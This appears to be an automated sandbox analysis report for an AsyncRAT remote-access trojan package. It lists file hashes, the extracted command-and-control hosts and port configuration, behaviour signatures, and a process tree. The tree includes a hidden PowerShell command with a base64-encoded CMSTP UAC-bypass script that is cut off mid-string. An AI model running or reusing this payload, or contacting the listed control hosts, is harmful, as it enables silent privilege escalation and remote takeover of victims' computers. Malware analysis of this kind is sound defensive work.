Overview
overview
10Static
static
10AsyncRAT/AsyncRAT.lnk
windows10-2004-x64
10AsyncRAT/AsyncRAT.lnk
windows10-ltsc 2021-x64
10AsyncRAT/P...at.dll
windows10-2004-x64
1AsyncRAT/P...at.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...ra.dll
windows10-2004-x64
1AsyncRAT/P...ra.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...er.dll
windows10-2004-x64
1AsyncRAT/P...er.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...er.dll
windows10-2004-x64
1AsyncRAT/P...er.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...er.dll
windows10-2004-x64
1AsyncRAT/P...er.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...us.dll
windows10-2004-x64
1AsyncRAT/P...us.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...ns.dll
windows10-2004-x64
1AsyncRAT/P...ns.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...er.dll
windows10-2004-x64
1AsyncRAT/P...er.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...ry.dll
windows10-2004-x64
1AsyncRAT/P...ry.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...ra.dll
windows10-2004-x64
1AsyncRAT/P...ra.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...op.dll
windows10-2004-x64
1AsyncRAT/P...op.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...le.dll
windows10-2004-x64
1AsyncRAT/P...le.dll
windows10-ltsc 2021-x64
1AsyncRAT/P...ry.dll
windows10-2004-x64
1AsyncRAT/P...ry.dll
windows10-ltsc 2021-x64
1AsyncRAT/S...ub.exe
windows10-2004-x64
10AsyncRAT/S...ub.exe
windows10-ltsc 2021-x64
10AsyncRAT/u...ig.exe
windows10-2004-x64
10AsyncRAT/u...ig.exe
windows10-ltsc 2021-x64
10Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
22-12-2024 21:46
Behavioral task
behavioral1
Sample
AsyncRAT/AsyncRAT.lnk
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
AsyncRAT/AsyncRAT.lnk
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral3
Sample
AsyncRAT/Plugins/Chat.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
AsyncRAT/Plugins/Chat.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral5
Sample
AsyncRAT/Plugins/Extra.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral6
Sample
AsyncRAT/Plugins/Extra.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral7
Sample
AsyncRAT/Plugins/FileManager.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral8
Sample
AsyncRAT/Plugins/FileManager.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral9
Sample
AsyncRAT/Plugins/FileSearcher.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral10
Sample
AsyncRAT/Plugins/FileSearcher.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral11
Sample
AsyncRAT/Plugins/LimeLogger.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral12
Sample
AsyncRAT/Plugins/LimeLogger.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral13
Sample
AsyncRAT/Plugins/Miscellaneous.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral14
Sample
AsyncRAT/Plugins/Miscellaneous.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral15
Sample
AsyncRAT/Plugins/Options.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral16
Sample
AsyncRAT/Plugins/Options.dll
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral17
Sample
AsyncRAT/Plugins/ProcessManager.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral18
Sample
AsyncRAT/Plugins/ProcessManager.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral19
Sample
AsyncRAT/Plugins/Recovery.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral20
Sample
AsyncRAT/Plugins/Recovery.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral21
Sample
AsyncRAT/Plugins/RemoteCamera.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral22
Sample
AsyncRAT/Plugins/RemoteCamera.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral23
Sample
AsyncRAT/Plugins/RemoteDesktop.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral24
Sample
AsyncRAT/Plugins/RemoteDesktop.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral25
Sample
AsyncRAT/Plugins/SendFile.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral26
Sample
AsyncRAT/Plugins/SendFile.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral27
Sample
AsyncRAT/Plugins/SendMemory.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral28
Sample
AsyncRAT/Plugins/SendMemory.dll
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral29
Sample
AsyncRAT/Stub/Stub.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral30
Sample
AsyncRAT/Stub/Stub.exe
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral31
Sample
AsyncRAT/upload.config.exe
Resource
win10v2004-20241007-en
General
-
Target
AsyncRAT/AsyncRAT.lnk
-
Size
938B
-
MD5
11f2bb2a95bfa3212ceafb66deeffdf2
-
SHA1
e68061495dc371e5a0dbd2c4130e908c680daf9e
-
SHA256
73394839eb747e047a28514e790c0d7c042488a277d42e984a284c84d3cd1927
-
SHA512
84af86271738f75d10974972894d21dd5acf4e197fafcd097928fbdcfb71d20c0e8c35c91aa46dc7fc91968603981151f4fc59910dd7fcde95b6bfa843145b57
Malware Config
Extracted
asyncrat
0.5.8
Default
jt8iyre.localto.net:2101
jt8iyre.localto.net:55644
AbAUwI3PK3e3
-
delay
3
-
install
false
-
install_file
winserve.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/2360-175-0x0000000006E10000-0x0000000006E22000-memory.dmp family_asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 36 2360 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 3896 powershell.exe 3288 powershell.exe 4516 powershell.exe 4576 powershell.exe 2360 powershell.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 1308 AsyncRAT.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Kills process with taskkill 1 IoCs
pid Process 1340 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 3896 powershell.exe 3896 powershell.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 3288 powershell.exe 3288 powershell.exe 3288 powershell.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 1308 AsyncRAT.exe 4516 powershell.exe 4516 powershell.exe 4576 powershell.exe 4576 powershell.exe 4576 powershell.exe 2360 powershell.exe 2360 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3896 powershell.exe Token: SeDebugPrivilege 3288 powershell.exe Token: SeIncreaseQuotaPrivilege 3288 powershell.exe Token: SeSecurityPrivilege 3288 powershell.exe Token: SeTakeOwnershipPrivilege 3288 powershell.exe Token: SeLoadDriverPrivilege 3288 powershell.exe Token: SeSystemProfilePrivilege 3288 powershell.exe Token: SeSystemtimePrivilege 3288 powershell.exe Token: SeProfSingleProcessPrivilege 3288 powershell.exe Token: SeIncBasePriorityPrivilege 3288 powershell.exe Token: SeCreatePagefilePrivilege 3288 powershell.exe Token: SeBackupPrivilege 3288 powershell.exe Token: SeRestorePrivilege 3288 powershell.exe Token: SeShutdownPrivilege 3288 powershell.exe Token: SeDebugPrivilege 3288 powershell.exe Token: SeSystemEnvironmentPrivilege 3288 powershell.exe Token: SeRemoteShutdownPrivilege 3288 powershell.exe Token: SeUndockPrivilege 3288 powershell.exe Token: SeManageVolumePrivilege 3288 powershell.exe Token: 33 3288 powershell.exe Token: 34 3288 powershell.exe Token: 35 3288 powershell.exe Token: 36 3288 powershell.exe Token: SeDebugPrivilege 1340 taskkill.exe Token: SeDebugPrivilege 4516 powershell.exe Token: SeDebugPrivilege 4576 powershell.exe Token: SeIncreaseQuotaPrivilege 4576 powershell.exe Token: SeSecurityPrivilege 4576 powershell.exe Token: SeTakeOwnershipPrivilege 4576 powershell.exe Token: SeLoadDriverPrivilege 4576 powershell.exe Token: SeSystemProfilePrivilege 4576 powershell.exe Token: SeSystemtimePrivilege 4576 powershell.exe Token: SeProfSingleProcessPrivilege 4576 powershell.exe Token: SeIncBasePriorityPrivilege 4576 powershell.exe Token: SeCreatePagefilePrivilege 4576 powershell.exe Token: SeBackupPrivilege 4576 powershell.exe Token: SeRestorePrivilege 4576 powershell.exe Token: SeShutdownPrivilege 4576 powershell.exe Token: SeDebugPrivilege 4576 powershell.exe Token: SeSystemEnvironmentPrivilege 4576 powershell.exe Token: SeRemoteShutdownPrivilege 4576 powershell.exe Token: SeUndockPrivilege 4576 powershell.exe Token: SeManageVolumePrivilege 4576 powershell.exe Token: 33 4576 powershell.exe Token: 34 4576 powershell.exe Token: 35 4576 powershell.exe Token: 36 4576 powershell.exe Token: SeIncreaseQuotaPrivilege 4576 powershell.exe Token: SeSecurityPrivilege 4576 powershell.exe Token: SeTakeOwnershipPrivilege 4576 powershell.exe Token: SeLoadDriverPrivilege 4576 powershell.exe Token: SeSystemProfilePrivilege 4576 powershell.exe Token: SeSystemtimePrivilege 4576 powershell.exe Token: SeProfSingleProcessPrivilege 4576 powershell.exe Token: SeIncBasePriorityPrivilege 4576 powershell.exe Token: SeCreatePagefilePrivilege 4576 powershell.exe Token: SeBackupPrivilege 4576 powershell.exe Token: SeRestorePrivilege 4576 powershell.exe Token: SeShutdownPrivilege 4576 powershell.exe Token: SeDebugPrivilege 4576 powershell.exe Token: SeSystemEnvironmentPrivilege 4576 powershell.exe Token: SeRemoteShutdownPrivilege 4576 powershell.exe Token: SeUndockPrivilege 4576 powershell.exe Token: SeManageVolumePrivilege 4576 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1308 AsyncRAT.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1308 AsyncRAT.exe -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 3100 wrote to memory of 4592 3100 cmd.exe 81 PID 3100 wrote to memory of 4592 3100 cmd.exe 81 PID 4592 wrote to memory of 1980 4592 upload.config.exe 83 PID 4592 wrote to memory of 1980 4592 upload.config.exe 83 PID 4592 wrote to memory of 4088 4592 upload.config.exe 84 PID 4592 wrote to memory of 4088 4592 upload.config.exe 84 PID 1980 wrote to memory of 1308 1980 cmd.exe 87 PID 1980 wrote to memory of 1308 1980 cmd.exe 87 PID 4088 wrote to memory of 2032 4088 cmd.exe 88 PID 4088 wrote to memory of 2032 4088 cmd.exe 88 PID 2032 wrote to memory of 3896 2032 WScript.exe 90 PID 2032 wrote to memory of 3896 2032 WScript.exe 90 PID 3896 wrote to memory of 852 3896 powershell.exe 95 PID 3896 wrote to memory of 852 3896 powershell.exe 95 PID 852 wrote to memory of 784 852 csc.exe 96 PID 852 wrote to memory of 784 852 csc.exe 96 PID 3896 wrote to memory of 1840 3896 powershell.exe 97 PID 3896 wrote to memory of 1840 3896 powershell.exe 97 PID 2032 wrote to memory of 4620 2032 WScript.exe 113 PID 2032 wrote to memory of 4620 2032 WScript.exe 113 PID 4620 wrote to memory of 4516 4620 cmd.exe 115 PID 4620 wrote to memory of 4516 4620 cmd.exe 115 PID 4620 wrote to memory of 4516 4620 cmd.exe 115 PID 4516 wrote to memory of 4576 4516 powershell.exe 116 PID 4516 wrote to memory of 4576 4516 powershell.exe 116 PID 4516 wrote to memory of 4576 4516 powershell.exe 116 PID 4516 wrote to memory of 2004 4516 powershell.exe 119 PID 4516 wrote to memory of 2004 4516 powershell.exe 119 PID 4516 wrote to memory of 2004 4516 powershell.exe 119 PID 2004 wrote to memory of 4304 2004 WScript.exe 120 PID 2004 wrote to memory of 4304 2004 WScript.exe 120 PID 2004 wrote to memory of 4304 2004 WScript.exe 120 PID 4304 wrote to memory of 2360 4304 cmd.exe 122 PID 4304 wrote to memory of 2360 4304 cmd.exe 122 PID 4304 wrote to memory of 2360 4304 cmd.exe 122
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\AsyncRAT\AsyncRAT.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Users\Admin\AppData\Local\Temp\AsyncRAT\upload.config.exe"C:\Users\Admin\AppData\Local\Temp\AsyncRAT\upload.config.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\SYSTEM32\cmd.execmd /k start AsyncRAT.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Users\Admin\AppData\Local\Temp\AsyncRAT\AsyncRAT.exeAsyncRAT.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1308
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /k start 7254_output.vbs3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AsyncRAT\7254_output.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gcmFuZG9tWFlaLUludm9rZS1VQUMgewoKCnBhcmFtKAogICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkdHJ1ZSldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpFeGVjdXRhYmxlLAogCiAgICBbUGFyYW1ldGVyKCldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpDb21tYW5kCikKCiRyYW5kb21YWVpJbmZEYXRhID0gQCcKW3ZlcnNpb25dClNpZ25hdHVyZT0kY2hpY2FnbyQKQWR2YW5jZWRJTkY9Mi41CgpbRGVmYXVsdEluc3RhbGxdCkN1c3RvbURlc3RpbmF0aW9uPXJhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnMKUnVuUHJlU2V0dXBDb21tYW5kcz1yYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb24KCltyYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb25dCkxJTkUKdGFza2tpbGwgL0lNIGNtc3RwLmV4ZSAvRgoKW3JhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnNdCjQ5MDAwLDQ5MDAxPXJhbmRvbVhZWi1BbGxVU2VyX0xESURTZWN0aW9uLCA3CgpbcmFuZG9tWFlaLUFsbFVTZXJfTERJRFNlY3Rpb25dCiJIS0xNIiwgIlNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXEFwcCBQYXRoc1xDTU1HUjMyLkVYRSIsICJQcm9maWxlSW5zdGFsbFBhdGgiLCAiJVVuZXhwZWN0ZWRFcnJvciUiLCAiIgoKW1N0cmluZ3NdClNlcnZpY2VOYW1lPSJyYW5kb21YWVpWUE4iClNob3J0U3ZjTmFtZT0icmFuZG9tWFlaVlBOIgonQAoKJHJhbmRvbVhZWkNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CnVzaW5nIFN5c3RlbS5UZXh0Owp1c2luZyBTeXN0ZW0uSU87CnVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsKdXNpbmcgU3lzdGVtLkNvbXBvbmVudE1vZGVsOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgcmFuZG9tWFlaQ01TVFBCeXBhc3MKewogICAgW0RsbEltcG9ydCgiU2hlbGwzMi5kbGwiLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgIHN0YXRpYyBleHRlcm4gSW50UHRyIFNoZWxsRXhlY3V0ZShJbnRQdHIgaHduZCwgc3RyaW5nIGxwT3BlcmF0aW9uLCBzdHJpbmcgbHBGaWxlLCBzdHJpbmcgbHBQYXJhbWV0ZXJzLCBzdHJpbmcgbHBEaXJlY3RvcnksIGludCBuU2hvd0NtZCk7CgogICAgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXQogICAgc3RhdGljIGV4dGVybiBJbnRQdHIgRmluZFdpbmRvdyhzdHJpbmcgbHBDbGFzc05hbWUsIHN0cmluZyBscFdpbmRvd05hbWUpOwoKICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KICAgIHN0YXRpYyBleHRlcm4gYm9vbCBQb3N0TWVzc2FnZShJbnRQdHIgaFduZCwgdWludCBNc2csIGludCB3UGFyYW0sIGludCBsUGFyYW0pOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIEJpbmFyeVBhdGggPSAiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbXN0cC5leGUiOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIFNldEluZkZpbGUoc3RyaW5nIENvbW1hbmRUb0V4ZWN1dGUsIHN0cmluZyBJbmZEYXRhKQogICAgewogICAgICAgIFN0cmluZ0J1aWxkZXIgT3V0cHV0RmlsZSA9IG5ldyBTdHJpbmdCdWlsZGVyKCk7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIkM6XFx3aW5kb3dzXFx0ZW1wIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIlxcIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLlNwbGl0KENvbnZlcnQuVG9DaGFyKCIuIikpWzBdKTsKICAgICAgICBPdXRwdXRGaWxlLkFwcGVuZCgiLmluZiIpOwogICAgICAgIFN0cmluZ0J1aWxkZXIgbmV3SW5mRGF0YSA9IG5ldyBTdHJpbmdCdWlsZGVyKEluZkRhdGEpOwogICAgICAgIG5ld0luZkRhdGEuUmVwbGFjZSgiTElORSIsIENvbW1hbmRUb0V4ZWN1dGUpOwogICAgICAgIEZpbGUuV3JpdGVBbGxUZXh0KE91dHB1dEZpbGUuVG9TdHJpbmcoKSwgbmV3SW5mRGF0YS5Ub1N0cmluZygpKTsKICAgICAgICByZXR1cm4gT3V0cHV0RmlsZS5Ub1N0cmluZygpOwogICAgfQoKICAgIHB1YmxpYyBzdGF0aWMgYm9vbCByYW5kb21YWVpFeGVjdXRlKHN0cmluZyBDb21tYW5kVG9FeGVjdXRlLCBzdHJpbmcgSW5mRGF0YSkKICAgIHsKICAgICAgICBjb25zdCBpbnQgV01fU1lTS0VZRE9XTiA9IDB4MDEwMDsKICAgICAgICBjb25zdCBpbnQgVktfUkVUVVJOID0gMHgwRDsKCiAgICAgICAgU3RyaW5nQnVpbGRlciBJbmZGaWxlID0gbmV3IFN0cmluZ0J1aWxkZXIoKTsKICAgICAgICBJbmZGaWxlLkFwcGVuZChTZXRJbmZGaWxlKENvbW1hbmRUb0V4ZWN1dGUsIEluZkRhdGEpKTsKCiAgICAgICAgUHJvY2Vzc1N0YXJ0SW5mbyBzdGFydEluZm8gPSBuZXcgUHJvY2Vzc1N0YXJ0SW5mbyhCaW5hcnlQYXRoKTsKICAgICAgICBzdGFydEluZm8uQXJndW1lbnRzID0gIi9hdSAiICsgSW5mRmlsZS5Ub1N0cmluZygpOwogICAgICAgIHN0YXJ0SW5mby5XaW5kb3dTdHlsZSA9IFByb2Nlc3NXaW5kb3dTdHlsZS5IaWRkZW47ICAvLyBIaWRkZW4gd2luZG93CiAgICAgICAgSW50UHRyIGRwdHIgPSBNYXJzaGFsLkFsbG9jSEdsb2JhbCgxKTsKICAgICAgICBTaGVsbEV4ZWN1dGUoZHB0ciwgIiIsIEJpbmFyeVBhdGgsIHN0YXJ0SW5mby5Bcmd1bWVudHMsICIiLCAwKTsKCiAgICAgICAgVGhyZWFkLlNsZWVwKDMwMDApOwogICAgICAgIEludFB0ciBXaW5kb3dUb0ZpbmQgPSBGaW5kV2luZG93KG51bGwsICJyYW5kb21YWVpWUE4iKTsKCiAgICAgICAgUG9zdE1lc3NhZ2UoV2luZG93VG9GaW5kLCBXTV9TWVNLRVlET1dOLCBWS19SRVRVUk4sIDApOwogICAgICAgIFRocmVhZC5TbGVlcCg1MDAwKTsKICAgICAgICBGaWxlLkRlbGV0ZShJbmZGaWxlLlRvU3RyaW5nKCkpOwogICAgICAgIHJldHVybiB0cnVlOwogICAgfQp9CiJACgokcmFuZG9tWFlaQ29uc2VudFByb21wdCA9IChHZXQtSXRlbVByb3BlcnR5IEhLTE06XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSkuQ29uc2VudFByb21wdEJlaGF2aW9yQWRtaW4KJHJhbmRvbVhZWlNlY3VyZURlc2t0b3BQcm9tcHQgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0pLlByb21wdE9uU2VjdXJlRGVza3RvcAppZiAoJHJhbmRvbVhZWkNvbnNlbnRQcm9tcHQgLUVxIDIgLWFuZCAkcmFuZG9tWFlaU2VjdXJlRGVza3RvcFByb21wdCAtRXEgMSkgewogICAgcmV0dXJuCn0KCnRyeSB7CiAgICAkcmFuZG9tWFlaVXNlciA9IFtTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eV06OkdldEN1cnJlbnQoKS5OYW1lCiAgICAkcmFuZG9tWFlaQWRtID0gR2V0LUxvY2FsR3JvdXBNZW1iZXIgLVNJRCBTLTEtNS0zMi01NDQgfCBXaGVyZS1PYmplY3QgeyAkXy5OYW1lIC1lcSAkcmFuZG9tWFlaVXNlciB9Cn0gY2F0Y2ggewogICAgJHJhbmRvbVhZWlVzZXIgPSBbU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHldOjpHZXRDdXJyZW50KCkuTmFtZQogICAgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgPSAnUy0xLTUtMzItNTQ0JwogICAgJHJhbmRvbVhZWkFkbWluR3JvdXAgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9Hcm91cCB8IFdoZXJlLU9iamVjdCB7ICRfLlNJRCAtZXEgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgfQogICAgJHJhbmRvbVhZWk1lbWJlcnMgPSAkcmFuZG9tWFlaQWRtaW5Hcm91cC5HZXRSZWxhdGVkKCJXaW4zMl9Vc2VyQWNjb3VudCIpCiAgICAkcmFuZG9tWFlaTWVtYmVycyB8IEZvckVhY2gtT2JqZWN0IHsgaWYgKCRfLkNhcHRpb24gLWVxICRyYW5kb21YWVpVc2VyKSB7ICRyYW5kb21YWVpBZG0gPSAkdHJ1ZSB9IH0KfQoKaWYgKCEkcmFuZG9tWFlaQWRtKSB7CiAgICByZXR1cm4KfQoKdHJ5IHsKICAgIGlmICghW1N5c3RlbS5JTy5GaWxlXTo6RXhpc3RzKCRyYW5kb21YWVpFeGVjdXRhYmxlKSkgewogICAgICAgICRyYW5kb21YWVpFeCA9IChHZXQtQ29tbWFuZCAkcmFuZG9tWFlaRXhlY3V0YWJsZSkKICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXguU291cmNlKSkgewogICAgICAgICAgICAkcmFuZG9tWFlaRXhlY3V0YWJsZSA9ICRFeGVjdXRpb25Db250ZXh0LlNlc3Npb25TdGF0ZS5QYXRoLkdldFVucmVzb2x2ZWRQcm92aWRlclBhdGhGcm9tUFNQYXRoKCRyYW5kb21YWVpFeGVjdXRhYmxlKQogICAgICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXhlY3V0YWJsZSkpIHsKICAgICAgICAgICAgICAgIHJldHVybgogICAgICAgICAgICB9CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgJHJhbmRvbVhZWkV4ZWN1dGFibGUgPSAoR2V0LUNvbW1hbmQgJHJhbmRvbVhZWkV4ZWN1dGFibGUpLk5hbWUKICAgICAgICB9CiAgICB9Cn0gY2F0Y2ggewogICAgcmV0dXJuCn0KCmlmICgkcmFuZG9tWFlaRXhlY3V0YWJsZS5Db250YWlucygicG93ZXJzaGVsbCIpKSB7CiAgICBpZiAoJHJhbmRvbVhZWkNvbW1hbmQgLW5lICIiKSB7CiAgICAgICAgJHJhbmRvbVhZWkZpbmFsID0gInBvd2Vyc2hlbGwgLVdpbmRvd1N0eWxlIEhpZGRlbiAtYyAiIiRyYW5kb21YWVpDb21tYW5kIiIiCiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlaWYgKCRyYW5kb21YWVpFeGVjdXRhYmxlLkNvbnRhaW5zKCJjbWQiKSkgewogICAgaWYgKCRyYW5kb21YWVpDb21tYW5kIC1uZSAiIikgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICJjbWQgL2MgIiIkcmFuZG9tWFlaQ29tbWFuZCIiIiAgIyBDaGFuZ2VkIHRvIC9jIHRvIGNsb3NlIHRoZSBjbWQgd2luZG93CiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlIHsKICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKfQoKZnVuY3Rpb24gcmFuZG9tWFlaRXhlY3V0ZSB7CiAgICB0cnkgewogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5h